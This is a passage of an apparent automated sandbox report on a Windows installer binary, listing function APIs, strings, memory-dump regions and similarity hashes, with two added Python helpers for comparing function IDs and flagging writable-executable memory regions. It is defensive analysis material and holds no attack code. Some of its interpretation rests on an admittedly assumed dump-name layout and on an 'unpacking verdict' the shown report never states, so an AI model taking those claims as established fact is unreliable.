• Opcode Fuzzy Hash: 8c55f0fe7c100a8d098827e3db406e6121508015b7b3e351e374acb5b0ce8d5c
• Instruction Fuzzy Hash: 2B117271500218DBDB01EFA1C992AED77B4BF44348F50412FFD05A7282DB78590EC79A
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0043538A
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
  • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
  • Part of subcall function 004357B3: __EH_prolog3_GS.LIBCMT ref: 004357BD
  • Part of subcall function 004358EC: __EH_prolog3_catch.LIBCMT ref: 004358F3
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$FreeH_prolog3_String$H_prolog3_catch
• String ID: HsG$ProductLanguage
• API String ID: 2885938503-3569323002
• Opcode ID: a941eff0b5c6773db7ac3b96046f7e76ef7878cb4a700490ce39392d411317a2
• Instruction ID: 2e2449e36cf8b86f1ff9459b97b83c778f1c9d76b6d9798da2772fc4eecafeee
• Opcode Fuzzy Hash: a941eff0b5c6773db7ac3b96046f7e76ef7878cb4a700490ce39392d411317a2
• Instruction Fuzzy Hash: 61119031900218EECB14EBA1CD51BEDB7B8AF51304F54419EF445B71C1EBB81B49CB5A
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3_
• String ID: HsG$CJ
• API String ID: 2427045233-3544447196
• Opcode ID: a328c0e021524afa007cb81a0d81fc5d8c9761823f3e3936ed1cc68449b318f0
• Instruction ID: ccd138e4788acbd0c55a2f10029d123d2c5930a593a5d8d2dc7e82ab92524f58
• Opcode Fuzzy Hash: a328c0e021524afa007cb81a0d81fc5d8c9761823f3e3936ed1cc68449b318f0
• Instruction Fuzzy Hash: 21117F71900208EBCB14EBB5C951ADDB7B8AF08304F20416FE516F7282EB786A49CF58
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0043504C
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorFreeLastString$H_prolog3_
• String ID: 0x%04x.ini$HsG
• API String ID: 1415129594-4051447474
• Opcode ID: af78edecdee6240305009839576aa9c9a9ac0d6df1a61d5021288a6bf0df5a8b
• Instruction ID: 1d05c432303de26f5731d90a79c38d214681b33e462660029db24995c23e43c6
• Opcode Fuzzy Hash: af78edecdee6240305009839576aa9c9a9ac0d6df1a61d5021288a6bf0df5a8b
• Instruction Fuzzy Hash: 0F116030900208EBDB14EB95CC86AEDB7B8BF08354F64412AF515B71D1EB79AD06CB98
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 004362AE
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 0040F49C: __EH_prolog3.LIBCMT ref: 0040F4A3
  • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
  • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLastString$AllocH_prolog3H_prolog3_
• String ID: HsG$VersionString
• API String ID: 3090045046-2849627625
• Opcode ID: 3ce8c0a6c512947abb26bb9a3f6436d17765d7f4305175464d48f25a92aaf9c8
• Instruction ID: 815e16bed325f40c300e6663f319c4cd242c3e0954d878af1279e16e1308cd15
• Opcode Fuzzy Hash: 3ce8c0a6c512947abb26bb9a3f6436d17765d7f4305175464d48f25a92aaf9c8
• Instruction Fuzzy Hash: C3114C71D00208DFDB00EBD0C855BEEBBB4BF14308F04806EE541BB291DBB85A09CB95
Uniqueness
Uniqueness Score: -1.00%
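The function records above are the part of the report a practitioner pivots on: the Opcode and Instruction IDs can be compared across reports to see whether two samples share code. The following is an added example, not Joe Sandbox code: it parses records in the layout shown on this page (APIs, Strings, Memory Dump Source, Similarity, Uniqueness), treats the IDs as opaque strings without assuming anything about how the tool derives them, and scores the overlap of two reports' function sets with a Jaccard index of this example's own choosing. The embedded sample text is constructed from two records on this page.

```python
"""Parse Joe Sandbox function-similarity records and measure the overlap of
two reports' function sets. Added example, not Joe Sandbox code: the record
layout is copied from the report page; the Opcode/Instruction IDs are opaque
strings here; the Jaccard overlap is this example's own metric."""
import re
from typing import Dict, List, Set

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Similarity", "Uniqueness"}
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")                      # "• Key: value"
API_CALL_RE = re.compile(r"([A-Za-z_]\w*)\.([A-Z0-9]+)(?:\(|\s+ref:)")  # Name.MODULE(...) / Name.MODULE ref:
REF_RE = re.compile(r"ref:\s*([0-9A-Fa-f]{8})")

# Constructed sample: two records from this page (Associated-dump lines omitted).
SAMPLE_REPORT = """APIs
• __EH_prolog3_GS.LIBCMT ref: 0043504C
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorFreeLastString$H_prolog3_
• String ID: 0x%04x.ini$HsG
• API String ID: 1415129594-4051447474
• Opcode ID: af78edecdee6240305009839576aa9c9a9ac0d6df1a61d5021288a6bf0df5a8b
• Instruction ID: 1d05c432303de26f5731d90a79c38d214681b33e462660029db24995c23e43c6
• Opcode Fuzzy Hash: af78edecdee6240305009839576aa9c9a9ac0d6df1a61d5021288a6bf0df5a8b
• Instruction Fuzzy Hash: 0F116030900208EBDB14EB95CC86AEDB7B8BF08354F64412AF515B71D1EB79AD06CB98
Uniqueness
Uniqueness Score: -1.00%
APIs
• __EH_prolog3_GS.LIBCMT ref: 004362AE
  • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLastString$AllocH_prolog3H_prolog3_
• String ID: HsG$VersionString
• API String ID: 3090045046-2849627625
• Opcode ID: 3ce8c0a6c512947abb26bb9a3f6436d17765d7f4305175464d48f25a92aaf9c8
• Instruction ID: 815e16bed325f40c300e6663f319c4cd242c3e0954d878af1279e16e1308cd15
• Opcode Fuzzy Hash: 3ce8c0a6c512947abb26bb9a3f6436d17765d7f4305175464d48f25a92aaf9c8
• Instruction Fuzzy Hash: C3114C71D00208DFDB00EBD0C855BEEBBB4BF14308F04806EE541BB291DBB85A09CB95
Uniqueness
Uniqueness Score: -1.00%
"""


def split_records(text: str) -> List[str]:
    """Each record starts with a line that is exactly 'APIs'."""
    records, current = [], []
    for line in text.splitlines():
        if line.strip() == "APIs" and current:
            records.append("\n".join(current))
            current = []
        current.append(line)
    if current:
        records.append("\n".join(current))
    return records


def parse_record(block: str) -> Dict:
    rec = {"apis": [], "first_call_ref": None, "source_file": None,
           "similarity": {}, "uniqueness": None}
    section = None
    for line in block.splitlines():
        s = line.strip()
        if s in SECTIONS:
            section = s
            continue
        field = FIELD_RE.match(s)
        if section == "APIs" and s.startswith("•"):
            rec["apis"].extend(f"{fn}.{mod}" for fn, mod in API_CALL_RE.findall(s))
            ref = REF_RE.search(s)               # first top-level call site in the function
            if ref and "subcall" not in s and rec["first_call_ref"] is None:
                rec["first_call_ref"] = int(ref.group(1), 16)
        elif section == "Memory Dump Source" and field and field.group(1) == "Source File":
            rec["source_file"] = field.group(2).split(",")[0].strip()
        elif section == "Similarity" and field:
            rec["similarity"][field.group(1)] = field.group(2)
        elif section == "Uniqueness" and s.startswith("Uniqueness Score:"):
            rec["uniqueness"] = float(s.split(":", 1)[1].strip().rstrip("%"))
    sim = rec["similarity"]
    if "API String ID" in sim:                   # "a-b" pair as printed by the report
        a, b = sim["API String ID"].split("-")
        rec["api_string_id"] = (int(a), int(b))
    # Sanity check visible on every record of the page: Opcode ID == Opcode Fuzzy Hash.
    rec["opcode_consistent"] = sim.get("Opcode ID") == sim.get("Opcode Fuzzy Hash")
    return rec


def parse_report(text: str) -> List[Dict]:
    return [parse_record(b) for b in split_records(text)]


def function_ids(records: List[Dict], key: str = "Instruction ID") -> Set[str]:
    return {r["similarity"][key] for r in records if key in r["similarity"]}


def jaccard(a: Set[str], b: Set[str]) -> float:
    return len(a & b) / len(a | b) if (a or b) else 0.0


def compare_reports(text_a: str, text_b: str, key: str = "Instruction ID") -> Dict:
    """Overlap of two reports' function sets by the chosen ID field."""
    ids_a, ids_b = function_ids(parse_report(text_a), key), function_ids(parse_report(text_b), key)
    return {"shared": sorted(ids_a & ids_b), "jaccard": jaccard(ids_a, ids_b)}


if __name__ == "__main__":
    for r in parse_report(SAMPLE_REPORT):
        print(hex(r["first_call_ref"] or 0), r["apis"], r["similarity"].get("String ID"))
    print(compare_reports(SAMPLE_REPORT, split_records(SAMPLE_REPORT)[0]))
```

Feed `compare_reports` the function section of two reports to get the shared Instruction IDs and an overlap score; switch `key` to `"Opcode ID"` to compare on the opcode-level hash instead. Because the report's IDs are emitted as opaque hex strings, the comparison is exact-match only; it finds identical functions, not near variants.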

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3_catch
• String ID: 4$|5H
• API String ID: 3886170330-974015250
• Opcode ID: 1bf949125347d4d5994c884308f422d03740c438766c9d2b80797010ed7dd3e0
• Instruction ID: 0d9e3f98248e1ea46beac7425a14ff0c6a9dc8000d84ebcc099d91e1b70d7464
• Opcode Fuzzy Hash: 1bf949125347d4d5994c884308f422d03740c438766c9d2b80797010ed7dd3e0
                                                                                                                                                                          • Instruction Fuzzy Hash: 051170719012059FDB14DF65C99166EBBB0EF84354F20842FF946AB391D638E944CF89
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

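The same ten memory-dump names recur under every function above, and the only thing that differs between them is the base address and the two numeric fields that follow it. The script below is an added triage helper, not part of the sandbox report or its vendor's tooling. It assumes the dump name layout is process-index.run.dump-id.base-address.protection.region-type.sdmp with the protection field holding the raw PAGE_* value that VirtualQuery reports; that layout is an interpretation, not something the report states. The PAGE_* constants and the copy-on-write behaviour in the comments are documented Windows facts. Run against the names from this report it singles out 0x401000 and 0x448000 (code mapped PAGE_EXECUTE_WRITECOPY, i.e. a writable code section) and 0x445000 (PAGE_EXECUTE_READWRITE, a page that has been written or re-protected at runtime) as the regions to dump first.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Page protection values from winnt.h (documented Windows constants).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXEC_BITS = 0x10 | 0x20 | 0x40 | 0x80
WRITE_BITS = 0x04 | 0x08 | 0x40 | 0x80

# ASSUMED layout of a dump name (the report does not document it):
# <proc-index>.<run>.<dump-id>.<base-address>.<protection>.<region-type>.sdmp
DUMP_RE = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<run>[0-9a-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<mtype>[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect, f"PAGE_0x{self.protect:X}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXEC_BITS)

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITE_BITS)


def parse_dump_name(name: str) -> DumpRegion:
    """Split one dump file name into its fields; raises on anything else."""
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"not a recognised dump name: {name}")
    return DumpRegion(name, int(m["base"], 16), int(m["protect"], 16), int(m["mtype"], 16))


def classify(region: DumpRegion) -> str:
    """Triage label. PAGE_EXECUTE_WRITECOPY on a code page means the PE section
    itself is marked writable+executable. PAGE_EXECUTE_READWRITE inside the image
    means the page is no longer the pristine copy-on-write mapping: Windows turns a
    written EXECUTE_WRITECOPY page into a private EXECUTE_READWRITE page, and a
    VirtualProtect call gives the same result. Either way, dump and diff it first."""
    if region.executable and region.writable:
        if region.protect == 0x40:
            return "RWX, modified in memory: dump and diff against the on-disk section"
        return "WX copy-on-write code: PE section mapped writable+executable"
    if region.executable:
        return "code"
    if region.writable:
        return "data"
    return "read-only"


def triage(names: List[str]) -> List[Tuple[int, str, str]]:
    """(base, protection name, label) for every dump, ordered by base address."""
    regions = sorted((parse_dump_name(n) for n in names), key=lambda r: r.base)
    return [(r.base, r.protect_name, classify(r)) for r in regions]


def suspicious_bases(names: List[str]) -> List[int]:
    """Bases of executable+writable regions, i.e. the candidate unpacking sites."""
    return [r.base for r in map(parse_dump_name, names) if r.executable and r.writable]


# The ten dump names listed in this report's Memory Dump Source entries.
REPORT_DUMPS = [
    "00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp",
    "00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp",
    "00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp",
    "00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp",
    "00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp",
    "00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp",
    "00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp",
    "00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp",
    "00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp",
    "00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp",
]

if __name__ == "__main__":
    for base, prot, label in triage(REPORT_DUMPS):
        print(f"{base:#010x}  {prot:<24} {label}")
```

The 0x445000 region is the interesting one: the file's own code pages are mapped PAGE_EXECUTE_WRITECOPY, so a page that now reads PAGE_EXECUTE_READWRITE has been written since the image was mapped, which is what the unpacking verdict rests on. Comparing that dump with the corresponding bytes of the on-disk section shows exactly what the stub rewrote.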
APIs
• __EH_prolog3_GS.LIBCMT ref: 0041C48A
  • Part of subcall function 004113B6: __EH_prolog3.LIBCMT ref: 004113BD
  • Part of subcall function 004119C2: __EH_prolog3_GS.LIBCMT ref: 004119CC
• lstrcpyW.KERNEL32 ref: 0041C4E6
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3_$H_prolog3lstrcpy
• String ID: |LJ
• API String ID: 3469851533-1752162465
• Opcode ID: 8f5dbf95b12e509dfaace01ae78478a25fd2ad05233cc46c23c27be335d8590a
• Instruction ID: 2c87a07abc69a0e6d05321f2f6b3985f7ae24e0d6bd794c1f80fa9cf6da4315e
• Opcode Fuzzy Hash: 8f5dbf95b12e509dfaace01ae78478a25fd2ad05233cc46c23c27be335d8590a
• Instruction Fuzzy Hash: 2911CE71640214ABCB10FBA1DC969EE37B6AB98304F4041AFF51A97192DF789E81CB5C
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00424DBD
  • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
  • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
  • Part of subcall function 00436124: __EH_prolog3_GS.LIBCMT ref: 0043612B
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
  • Part of subcall function 004286EB: __EH_prolog3_GS.LIBCMT ref: 004286F5
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$H_prolog3_$FreeString
• String ID: Type$dotnetfx.exe
• API String ID: 1274762985-1335848363
• Opcode ID: cd217c52dc3861d985e36983301d46a061fb8f2545ab4e867fa8c2a1b8f399c9
• Instruction ID: 1b95482946a42471ac1e8c63391098f74d5ec88ddfc0dd1566a08decf3546e59
• Opcode Fuzzy Hash: cd217c52dc3861d985e36983301d46a061fb8f2545ab4e867fa8c2a1b8f399c9
• Instruction Fuzzy Hash: 1C01C031A00218AAEF14E6A0CC52BED7768BB50354F64402FF501BB1D2EBB94E09CB9D
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00423CD3
  • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
  • Part of subcall function 00424D64: __EH_prolog3_GS.LIBCMT ref: 00424D6B
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 00425C00: __EH_prolog3_GS.LIBCMT ref: 00425C07
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$H_prolog3_$FreeString$H_prolog3
• String ID: HsG$dotnetredistSp3.exe
• API String ID: 1949661404-504104211
• Opcode ID: c07822fc1006e317cf9623e8ff3dc701a981d7e4c47e5144fd6513e8bce694cd
• Instruction ID: aa4ca67da04d656629cb1949c34205e267b425058fa3c847079600a197cd7a7e
• Opcode Fuzzy Hash: c07822fc1006e317cf9623e8ff3dc701a981d7e4c47e5144fd6513e8bce694cd
• Instruction Fuzzy Hash: 8D116071900218EADB10E6A0CC46BEDB778AB41304F54419EF505B71C2EBB41B09CB9A
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
• This setup was created with a BETA VERSION of %s, xrefs: 00438633
• This setup was created with a EVALUATION VERSION of %s, xrefs: 00438673
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3_
• String ID: This setup was created with a BETA VERSION of %s$ This setup was created with a EVALUATION VERSION of %s
• API String ID: 2427045233-3771001655
• Opcode ID: e395ea637f5affd3f16115e39a5629235ca78a6aecb7dc9c2c621fbe2bb9f109
• Instruction ID: f758eb17bbebab1c8386df697a63ad80202328f38cb4b24be8f50f4f5d6767c1
• Opcode Fuzzy Hash: e395ea637f5affd3f16115e39a5629235ca78a6aecb7dc9c2c621fbe2bb9f109
• Instruction Fuzzy Hash: D4118E70E40244AEFB14EBA1CC56FACB664AB11714F50815EF051BB1D2DBB85E4AC748
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
• {%08lX-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}, xrefs: 0041F61F
• HsG, xrefs: 0041F5D2
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3
                                                                                                                                                                          • String ID: HsG${%08lX-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
                                                                                                                                                                          • API String ID: 431132790-3319768364
                                                                                                                                                                          • Opcode ID: 84f6f345e858f75e5c36acae00614aa610618de09e8d9a32579aa21ec84722f1
                                                                                                                                                                          • Instruction ID: 80705aca042654855826a4ff0bf7a8cefc4eabf443a8eab813ce61de2f213955
                                                                                                                                                                          • Opcode Fuzzy Hash: 84f6f345e858f75e5c36acae00614aa610618de09e8d9a32579aa21ec84722f1
                                                                                                                                                                          • Instruction Fuzzy Hash: 1A0161A54041946EC7519BA64810B76BAE85B09319F28C09BF598C91C2D67EC643DB68
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 004556A8
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,00000000,00455C12), ref: 004556C3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
